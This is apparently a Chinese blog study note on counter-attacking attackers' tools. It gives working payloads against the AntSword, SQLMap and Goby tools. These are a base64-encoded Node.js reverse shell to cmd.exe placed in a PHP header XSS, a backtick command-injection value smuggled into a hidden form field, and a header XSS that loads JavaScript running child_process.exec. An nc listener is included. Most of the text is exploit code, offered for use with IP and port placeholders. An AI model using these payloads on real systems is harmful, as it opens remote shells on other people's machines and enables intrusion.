【笔记】溯源反制学习笔记

发表于 更新于 阅读次数:

前言

溯源反制学习笔记

受害者监听反弹Shell

  • 受害者(也就是反制时的攻击者)监听反弹Shell
1
nc -lvp <port>

反制蚁剑

  • 蚁剑会在连接受害者时执行Nodejs代码,所以可以通过Nodejs代码进行反弹Shell

生成被Base64编码后的Nodejs上线代码

<ip>:受害者的IP地址,也就是反制时的攻击者IP地址
<port>:受害者的端口号,也就是反制时的攻击者端口号

main.js
1
2
3
4
5
6
7
8
9
10
11
const result = Buffer.from(`
  const net = require("net");
  const shell = require("child_process").exec("cmd.exe");
  const client = new net.Socket();
  client.connect(<port>, "<ip>", function () {
    client.pipe(shell.stdin);
    shell.stdout.pipe(client);
    shell.stderr.pipe(client);
  });
`).toString("base64");
console.log(result)
1
node main.js
1
CiAgICBjb25zdCBuZXQgPSByZXF1aXJlKCJuZXQiKTsKICAgIGNvbnN0IHNoZWxsID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKICAgIGNvbnN0IGNsaWVudCA9IG5ldyBuZXQuU29ja2V0KCk7CiAgICBjbGllbnQuY29ubmVjdCg8cG9ydD4sICI8aXA+IiwgZnVuY3Rpb24gKCkgewogICAgICAgIGNsaWVudC5waXBlKHNoZWxsLnN0ZGluKTsKICAgICAgICBzaGVsbC5zdGRvdXQucGlwZShjbGllbnQpOwogICAgICAgIHNoZWxsLnN0ZGVyci5waXBlKGNsaWVudCk7CiAgICB9KTsK

篡改攻击者的木马

1
2
3
<?php
header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`CiAgICBjb25zdCBuZXQgPSByZXF1aXJlKCJuZXQiKTsKICAgIGNvbnN0IHNoZWxsID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKICAgIGNvbnN0IGNsaWVudCA9IG5ldyBuZXQuU29ja2V0KCk7CiAgICBjbGllbnQuY29ubmVjdCg8cG9ydD4sICI8aXA+IiwgZnVuY3Rpb24gKCkgewogICAgICAgIGNsaWVudC5waXBlKHNoZWxsLnN0ZGluKTsKICAgICAgICBzaGVsbC5zdGRvdXQucGlwZShjbGllbnQpOwogICAgICAgIHNoZWxsLnN0ZGVyci5waXBlKGNsaWVudCk7CiAgICB9KTsK`,`base64`).toString())'>");
?>

反弹Shell

  • 攻击者在使用蚁剑进行连接时,会反弹Shell

反制SQLMap

构造一个可能会出现SQL注入的页面

<shell>:远程执行的命令,这里可以替换成上线命令

1
2
3
4
5
6
7
8
9
10
11
12
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Document</title>
</head>
<body>
  <form action="">
    <input type='hidden' name='key' value="value`<shell>`"/>
    <input type="submit" value='提交'>
  </form>
</body>
</html>

反弹Shell

  • 攻击者在SQLMap进行SQL注入时,会执行Shell,如果是反弹Shell命令则会反弹Shell
1
sqlmap -u "http://127.0.0.1:80/index.html?key=value`<shell>`"

反制Goby

构造一个可能会被漏洞扫描的页面

index.php
1
2
3
<?php
header("X-Powered-By: PHP/<img src=# onerror=import(unescape('/index.js'))>");
?>

<shell>:远程执行的命令,这里可以替换成上线命令

index.js
1
2
3
(function (){
  require('child_process').exec('<shell>');
})();

反弹Shell

  • 攻击者在使用Goby扫描结束后,查看资产信息时,会执行Shell,如果是反弹Shell命令则会反弹Shell

反制CobaltStrike客户端

CVE-2022-39197漏洞利用

完成